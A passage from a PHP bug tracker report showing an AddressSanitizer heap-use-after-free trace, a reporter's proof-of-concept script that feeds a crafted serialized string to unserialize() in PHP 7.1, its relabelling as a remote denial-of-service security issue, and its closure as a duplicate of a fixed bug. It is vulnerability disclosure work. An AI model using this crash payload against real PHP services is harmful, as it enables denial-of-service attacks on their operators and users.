    #21 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: heap-use-after-free /home/varsleak/github/php-orig/Zend/zend_types.h:332:18 in zval_get_type
Shadow bytes around the buggy address:
  0x0c247fffb350: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb360: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffb370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffb380: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c247fffb3a0: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c247fffb3b0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c247fffb3c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29990==ABORTING
 [2017-06-09 09:50 UTC] varsleak at gmail dot com
-Operating System: Test on Ubuntu 16.04 x64 +Operating System: Ubuntu 1604 & Windows10 -PHP Version: 7.1.5 +PHP Version: 7.1.6
 [2017-06-09 09:50 UTC] varsleak at gmail dot com 
add new PoC:
<?php
    $crashed_data ='O:9:"AAAAAAAAA":1:0S:1:"0";a:15:{s:8:"AAAAAAAA";i:-0;s:1:"m";i:0;s:1:"d";i:0;s:1:"i";i:00;s:1:"i";i:1;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;i:0;a:1:{i:0;r:6;}i:1;a:123:{s:1:"y";i:2;s:8:"AAAAAAAA";i:0;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:8:"AAAAAAAA";d:000;s:1:"i";i:10;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;i:0;a:1:{i:0;r:6;}i:1;a:200000000000000000000000000000000:{s:1:"y";i:2;s:1:"A";i:0;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:2:"Ad";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"A";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:1;s:1:"s";d:1;s:1:"2";R:+7;s:1:"s";i:-6;s:1:"y";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"A";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:7:"0010day";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"1";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"6";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"3";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:7:"-000day";d:1;s:1:"i";R:+7;s:1:"s";i:6;s:7:"-000day";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"s";i:-6;s:2:"0y";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"A";';
    unserialize($crashed_data);
?>
 [2017-08-04 10:28 UTC] varsleak at gmail dot com
-Type: Bug +Type: Security -Private report: No +Private report: Yes
 [2017-08-04 10:28 UTC] varsleak at gmail dot com 
It will cause a Remote Denial of Service vulnerability.
 [2017-08-12 13:14 UTC] nikic@php.net
-Status: Open +Status: Duplicate
 [2017-08-12 13:14 UTC] nikic@php.net 
This is a duplicate of bug #74103, which is now fixed.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu Nov 21 12:01:29 2024 UTC